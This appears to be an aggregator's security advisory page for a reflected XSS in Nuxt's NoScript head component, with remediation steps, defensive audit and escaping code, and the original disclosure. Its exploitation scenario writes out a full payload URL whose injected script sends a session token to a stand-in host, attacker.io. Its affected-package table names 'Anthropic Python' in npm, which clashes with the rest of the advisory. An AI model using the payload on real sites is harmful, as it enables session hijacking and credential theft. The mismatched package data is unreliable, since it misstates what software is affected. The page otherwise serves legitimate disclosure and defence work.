GHSA-m3q2-p4fw-w38m: Nuxt: NoScript XSS enables script execution in head

GHSA-m3q2-p4fw-w38m LOW
Published June 16, 2026
CISO Take

Nuxt's globally registered `<NoScript>` component wrote slot content directly to `innerHTML` instead of `textContent`, bypassing Vue's standard HTML escaping and allowing unescaped attacker-controlled data to be emitted in the server-rendered `<noscript>` head element. Any Nuxt application that interpolates untrusted input (such as URL query parameters) into a `<NoScript>` slot is vulnerable to reflected XSS, where the browser's HTML parser re-processes the payload outside the noscript context and executes it as arbitrary JavaScript. With 5,435 downstream dependents, AI/ML service portals, chatbot frontends, and admin dashboards built on Nuxt could expose session tokens, Clerk/Auth credentials, or LLM API keys to attackers who deliver crafted phishing URLs to privileged users. Upgrade to nuxt@4.4.7 (v4.x) or nuxt@3.21.7 (v3.x) immediately; if blocked, audit all `<NoScript>` usages for dynamic input and switch to `useHead({ noscript: [{ textContent: escapedValue }] })` as a workaround.

Sources: GitHub Advisory ATLAS

What is the risk?

Low-to-moderate severity in isolation, but the blast radius is amplified by 5,435 downstream dependents and the prevalence of Nuxt as a frontend framework for AI SaaS products and admin interfaces. No EPSS data is available and no public exploit or active exploitation is confirmed, but the attack vector is trivial once a vulnerable code path is identified — a crafted query parameter is sufficient. The highest risk scenario involves AI platform operators with elevated privileges visiting attacker-crafted URLs, enabling session hijacking against authenticated API and compliance surfaces.

How does the attack unfold?

  1. Reconnaissance (AML.T0003): Attacker identifies a public Nuxt-based AI portal with query parameters reflected into `<NoScript>` slots via source review, URL fuzzing, or reviewing the application's open-source frontend code.

  2. Payload Delivery (AML.T0011.003): Attacker crafts a malicious URL embedding a `<script>` tag in the vulnerable query parameter and delivers it to a privileged operator via phishing or poisoned search results.

  3. Exploitation (AML.T0049): Nuxt's server-side renderer emits the unescaped payload into the `<noscript>` head element; the browser's HTML parser re-processes the script tag outside the noscript context and executes arbitrary JavaScript.

  4. Credential Exfiltration (AML.T0055): The injected script exfiltrates session tokens, LLM API keys, or authentication state from browser storage to the attacker's server, enabling session hijacking and unauthorized AI platform access.

What systems are affected?

Package           Ecosystem   Vulnerable Range     Patched
Anthropic Python  npm         >= 4.0.0, < 4.4.7    4.4.7

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What should I do?

5 steps
  1. Upgrade to `nuxt@4.4.7` (v4.x) or `nuxt@3.21.7` (v3.x) — the patch routes `<NoScript>` slot content through `escapeHtml` from `@vue/shared` and writes to `textContent` instead of `innerHTML`.

  2. Audit your codebase for all `<NoScript>` usages with untrusted data: `grep -r '<NoScript>' --include='*.vue' --include='*.astro'`. Flag any that interpolate variables from route, query, props, or external sources.

  3. If upgrade is blocked, replace `<NoScript>{{ x }}</NoScript>` with `useHead({ noscript: [{ textContent: escapedValue }] })` after HTML-escaping `escapedValue` at source.

  4. Review and harden Content Security Policy script-src directives on AI-facing applications as defense-in-depth to limit XSS impact scope.

  5. Enable Dependabot or Renovate to catch transitive Nuxt version pulls across downstream packages.
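
The audit in step 2 can be automated beyond a bare grep. The helper below is an added example, not code from Nuxt or from the advisory: it scans Vue single-file-component source for `<NoScript>` slots whose content is dynamic and reports which ones take input from route, query or props. It assumes the PascalCase `<NoScript>` tag and treats the identifiers `route`, `query`, `params`, `props` and `useRoute` as markers of untrusted input.

```javascript
// Added audit helper (not Nuxt's or the advisory's own code): flags
// <NoScript> slots with {{ }} interpolation or a v-html directive, and
// rates them "high" when the expression references request-derived data.
const NOSCRIPT_RE = /<NoScript\b([^>]*)>([\s\S]*?)<\/NoScript>/g;
const INTERP_RE = /\{\{([\s\S]*?)\}\}/g;
// Assumption: these identifiers mark request-controlled (untrusted) input.
const UNTRUSTED_RE = /\b(route|query|params|props|useRoute)\b/;

function auditNoScript(source, file = "unknown.vue") {
  const findings = [];
  for (const m of source.matchAll(NOSCRIPT_RE)) {
    const [, attrs, slot] = m;
    // 1-based line of the opening tag, for the report.
    const line = source.slice(0, m.index).split("\n").length;
    const exprs = [...slot.matchAll(INTERP_RE)].map((e) => e[1].trim());
    const usesVHtml = /\bv-html\b/.test(attrs);
    if (exprs.length === 0 && !usesVHtml) continue; // static text: not affected
    const untrusted = exprs.some((e) => UNTRUSTED_RE.test(e));
    findings.push({
      file,
      line,
      expressions: exprs,
      risk: untrusted ? "high" : "review",
      fix: "upgrade nuxt, or useHead({ noscript: [{ textContent }] }) with escaped input",
    });
  }
  return findings;
}

// Constructed sample component: one static slot, one reflected query
// parameter, one i18n lookup that still deserves a manual look.
const SAMPLE_VUE = `<template>
  <Head>
    <NoScript>Please enable JavaScript</NoScript>
    <NoScript>{{ route.query.banner }}</NoScript>
    <NoScript>{{ $t('noscript.message') }}</NoScript>
  </Head>
</template>`;

function demo() {
  return auditNoScript(SAMPLE_VUE, "app.vue");
}
```

Run `demo()` over real files by reading each `*.vue` and passing its text and path; only the `high` findings need to change before the upgrade lands.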

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Art. 9 - Risk management system
ISO 42001: A.9.2 - Information security in AI system development
NIST AI RMF: MANAGE-2.2 - Mechanisms to sustain the value of deployed AI

Frequently Asked Questions

Is GHSA-m3q2-p4fw-w38m actively exploited?

No confirmed active exploitation of GHSA-m3q2-p4fw-w38m has been reported, but organizations should still patch proactively.

What is the CVSS score for GHSA-m3q2-p4fw-w38m?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI web frontends (Nuxt-based)
LLM chatbot portals and conversational AI UIs
Model administration dashboards
AI SaaS subscription and compliance platforms

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.9.2
NIST AI RMF: MANAGE-2.2

What are the technical details?

Original Advisory

### Impact

Nuxt's globally registered `<NoScript>` component (from `@unhead/vue` head components, re-exported by Nuxt) wrote its default-slot content to the `innerHTML` of the `<noscript>` head tag, bypassing the HTML escaping that `{{ }}` interpolation normally applies in Vue templates. Applications that placed untrusted, attacker-controllable data inside a `<NoScript>` slot, for example:

```vue
<NoScript>{{ route.query.banner }}</NoScript>
```

would emit that value unescaped inside `<noscript>` in the server-rendered HTML. With scripting enabled, the HTML parser treats `<noscript>` content in `<head>` under the "in head noscript" insertion mode: any tag other than `link`, `meta`, `noframes`, or `style` implicitly closes `<noscript>` and is re-processed in the head. A payload such as `<script>...</script>` therefore escapes the element and executes in the document context. Sibling head components (`<Style>`, `<Title>`) were not affected because they already routed slot text through the safe `textContent` path.

### Affected versions

All currently supported versions of `nuxt` that ship the `<NoScript>` global component.

### Patches

Fixed in `nuxt@4.4.7` (commit [`4b054e9d`](https://github.com/nuxt/nuxt/commit/4b054e9d95f8daf366cb144b52782047c511a66e)) and backported to `nuxt@3.21.7` (commit [`7fea9fd6`](https://github.com/nuxt/nuxt/commit/7fea9fd687f1dacbfb63db5fae5839896b017a0e)). The fix escapes `<NoScript>` slot content with `escapeHtml` from `@vue/shared` and writes it to `textContent` rather than `innerHTML`. Slot content is now rendered as text; intentional markup inside `<NoScript>` is no longer parsed as HTML.

### Workarounds

Until you can upgrade:

- Do not interpolate untrusted input into `<NoScript>` slots. Replace `<NoScript>{{ x }}</NoScript>` with a static string, or sanitise / HTML-escape `x` at the source.
- If you must render dynamic noscript content, write the tag yourself via `useHead({ noscript: [{ textContent: escapedValue }] })` after escaping `escapedValue`.

### Credit

Reported to Anthropic's coordinated vulnerability disclosure pipeline by Claude (Anthropic's AI assistant) and triaged by the Anthropic security team. Reference: ANT-2026-4NJYDFFM. Independently reported by [@alcls01111](https://github.com/alcls01111) via GitHub's coordinated disclosure flow (`GHSA-8grp-wcq9-925q`), closed as a duplicate of this advisory.
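
The difference between the vulnerable `innerHTML` path and the patched `textContent` path is easiest to see on a rendered string. The block below is an added example, not code from Nuxt or `@unhead/vue`: `escapeHtml` re-implements the character set that `@vue/shared`'s `escapeHtml` covers (`&`, `<`, `>`, `"`, `'`), and the two render functions are simplified stand-ins for the head renderer (an assumption about its shape, not its actual code). The check at the end is the property a defender wants: after escaping, the `<noscript>` body contains no tag delimiter, so no parser insertion mode can turn it into an element.

```javascript
// Added example, not Nuxt's or @unhead/vue's own code: models the vulnerable
// and fixed ways of building the <noscript> head tag from slot text.

// Mirrors the character set escaped by @vue/shared's escapeHtml (assumption:
// same five characters). '&' must be replaced first to avoid double-escaping.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable shape: slot text is treated as markup (the innerHTML path).
function renderNoscriptVulnerable(slot) {
  return `<noscript>${slot}</noscript>`;
}

// Fixed shape: slot text is escaped and emitted as text (the textContent path).
function renderNoscriptFixed(slot) {
  return `<noscript>${escapeHtml(slot)}</noscript>`;
}

// Defender check: a <noscript> body with no '<' or '>' cannot open or close
// any element, whatever insertion mode the HTML parser is in.
function noscriptBodyIsInert(html) {
  const body = html.slice("<noscript>".length, -"</noscript>".length);
  return !/[<>]/.test(body);
}

// Constructed untrusted value, standing in for route.query.banner.
const UNTRUSTED_BANNER = "Offline mode <script>x()</script>";

function demo() {
  const vulnerable = renderNoscriptVulnerable(UNTRUSTED_BANNER);
  const fixed = renderNoscriptFixed(UNTRUSTED_BANNER);
  return {
    vulnerable,
    fixed,
    vulnerableInert: noscriptBodyIsInert(vulnerable), // false: script survives
    fixedInert: noscriptBodyIsInert(fixed),           // true: rendered as text
  };
}
```

Note that the patched component now renders intentional markup as text too, so a `<NoScript>` slot that previously carried a `<img>` or `<a>` fallback needs to move to `useHead({ noscript: [...] })` with explicit fields.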

Exploitation Scenario

An adversary identifies a Nuxt-based AI threat intelligence portal or LLM chatbot dashboard that renders noscript banners dynamically from URL query parameters: `<NoScript>{{ route.query.banner }}</NoScript>`. The attacker constructs a URL such as `https://ai-portal.example.com/?banner=<script>fetch('https://attacker.io/exfil?t='+localStorage.getItem('session_token'))</script>` and delivers it via a phishing email or a poisoned result in a security community forum. When a privileged operator (e.g., a CISO or platform admin) visits the link, Nuxt's server-side renderer emits the unescaped payload inside `<noscript>` in the document head. The browser's HTML parser re-processes the `<script>` tag outside the noscript element and executes it, exfiltrating the victim's session token or LLM API key to the attacker's server — granting unauthorized access to premium intelligence feeds, compliance evidence packs, or administrative controls.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, Casca…, etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.

Timeline

Published: June 16, 2026
Last Modified: June 16, 2026
First Seen: June 17, 2026